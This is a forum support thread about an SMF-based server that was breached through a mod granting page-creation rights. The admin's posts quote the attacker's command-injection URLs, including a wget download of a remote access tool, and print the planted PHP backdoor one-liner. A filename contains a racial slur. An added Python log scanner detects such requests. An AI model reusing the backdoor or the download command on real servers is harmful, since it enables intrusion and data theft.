
Dedicated server hacked through SMF

Started by Maldark, June 05, 2016, 12:40:37 PM


Maldark

Hi there

Last night we experienced a breach through the SMF.

By tracing his steps, we've found out that he did this by manipulating the URL parameters to run actual Linux commands on our server.
For instance he ran this command index.php?page=page4836&ctime=system&atime=ls and got a list of our files in this folder. In the end he ran /index.php?page=page4836&ctime=system&atime=wget%20http:hxxp:pastebin.com/raw/ndBmTApt%20-O%20nigger.php [nonactive] which downloaded a "remote access" tool into the file nigger.php

He slowly gained more and more access, to a point where he not only had access to the SQL account that our SMF used, but also other SQL accounts that had access to ip-addresses of our players.

So my question is this: how do we prevent a user from doing such a thing?

Kind regards
Maldark

Maldark

By the looks of it, the hacker breached an account that (by some mistake) had rights to make "pages"; this page he filled with:

<?php
@extract($_REQUEST);
@die($ctime($atime));
?>

which he in turn executed using a query like the one described in the first message. He ran the wget command as "the webserver", so he was allowed to save it in the cache folder and later executed it via GET/POST requests.

Any suggestions as to how to improve our security are much appreciated! Obviously we're fixing the rank that had the wrong privileges.
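As an added, defender-side illustration (this is not code from the thread, from SMF or from the mod in question), the following Python script hunts an access log for the pattern described in the two posts above: query-string values that name a PHP command-execution function, values that carry a download command such as wget, and PHP scripts requested directly from the cache directory. The log lines, IP addresses, remote URL and file name are constructed placeholders; the detection rules are the example's own assumptions about what such a probe-download-execute chain looks like in a web server log.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in combined log format, modelled on the requests
# described in the thread. IPs, the remote URL and the file name are placeholders.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Jun/2016:02:11:04 +0000] "GET /index.php?page=page4836&ctime=system&atime=ls HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jun/2016:02:13:51 +0000] "GET /index.php?page=page4836&ctime=system&atime=wget%20http://example.invalid/raw/PLACEHOLDER%20-O%20shell.php HTTP/1.1" 200 14 "-" "Mozilla/5.0"
198.51.100.20 - - [05/Jun/2016:02:15:00 +0000] "GET /index.php?board=3.0 HTTP/1.1" 200 9821 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jun/2016:02:16:30 +0000] "POST /cache/shell.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# PHP callables that run OS commands or code. A query value equal to one of
# these is a strong sign that a "$fn($arg)" style backdoor is being driven.
EXEC_CALLABLES = {
    "system", "exec", "shell_exec", "passthru", "popen",
    "proc_open", "pcntl_exec", "assert", "create_function",
}
# Values that look like a command fetching a file from the internet.
DOWNLOADER_RE = re.compile(r"^\s*(wget|curl|fetch)\b", re.IGNORECASE)
# Scripts executed from a directory that should only ever hold cached data.
CACHE_PHP_RE = re.compile(r"^/cache/[^?]*\.php$", re.IGNORECASE)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def analyse_request(target):
    """Return the reasons a single request target looks like shell abuse."""
    reasons = []
    parts = urlsplit(target)
    if CACHE_PHP_RE.match(parts.path):
        reasons.append(f"php script executed from cache dir: {parts.path}")
    # parse_qsl percent-decodes the values, so "wget%20http..." becomes "wget http...".
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        v = value.strip().lower()
        if v in EXEC_CALLABLES:
            reasons.append(f"param {name!r} names exec callable {v!r}")
        elif DOWNLOADER_RE.match(value):
            reasons.append(f"param {name!r} carries download command {value!r}")
    return reasons


def scan_log(text):
    """Parse combined-format log lines and return the suspicious requests."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        reasons = analyse_request(m["target"])
        if reasons:
            hits.append({
                "ip": m["ip"], "ts": m["ts"], "method": m["method"],
                "target": m["target"], "reasons": reasons,
            })
    return hits


def chain_by_ip(hits):
    """Group suspicious requests per client so the probe->download->run sequence is visible."""
    chains = {}
    for h in hits:
        chains.setdefault(h["ip"], []).append(h)
    return chains


if __name__ == "__main__":
    for ip, steps in chain_by_ip(scan_log(SAMPLE_LOG)).items():
        print(f"{ip}: {len(steps)} suspicious request(s)")
        for s in steps:
            print(f"  {s['ts']} {s['method']} {s['target']}")
            for r in s["reasons"]:
                print(f"    - {r}")
```

Run against a real access log, the grouping per client address is what turns three isolated matches into the story the thread tells: a directory listing probe, a download written into the web server's writable cache directory, and then direct requests to the dropped script. A hit on the cache-directory rule alone is worth checking even without the other two, since nothing legitimate should be serving PHP from there.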


Kindred

Also, given that the pages function that you mention is not actually part of SMF, it must have been added via a mod...

Giving anyone access to a function that grants them the ability to run php scripts is always going to be a security risk and there is not much that can be done about it... That's why you need to be VERY careful about granting permissions
Glory to Ukraine

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."
